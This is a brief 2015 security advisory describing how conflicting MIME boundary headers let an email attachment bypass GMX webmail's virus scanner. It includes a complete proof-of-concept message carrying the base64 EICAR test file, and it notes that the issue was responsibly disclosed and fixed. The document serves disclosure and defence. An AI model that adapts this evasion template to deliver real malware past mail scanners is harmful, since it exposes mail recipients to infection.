July 2015
Please note that republishing this article in full or in part is only allowed under the conditions described here.
Bypassing GMX Virus Scanning using Conflicting MIME Boundaries
The virus scanner integrated in GMX mail can be bypassed by using conflicting MIME boundaries. This kind of evasion is in detail described in Dubious MIME - Conflicting Multipart Boundaries.
Proof Of Concept
GMX Webmail will use the second boundary 'bar' for displaying the mail and for downloads of
attachments. This way it provides access to the attached file 'eicar.com' which contains the
Eicar test virus.
The virus scanner instead will use the first boundary 'foo' and thus will not see the attacht virus.
From: foo
To: bar
Subject: eicar - conflicting boundaries
Mime-Version: 1.0
Content-type: multipart/mixed; boundary=foo
Content-type: multipart/mixed; boundary=bar
--foo
Content-type: text/plain
--bar
Content-type: application/octet-stream; name=eicar.com
Content-Transfer-Encoding: base64
WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNU
QU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo=
--bar--
--foo--
Responsible Disclosure
The issue was reported to GMX in 06/2015 (ticket C542162419) and fixed within a few weeks.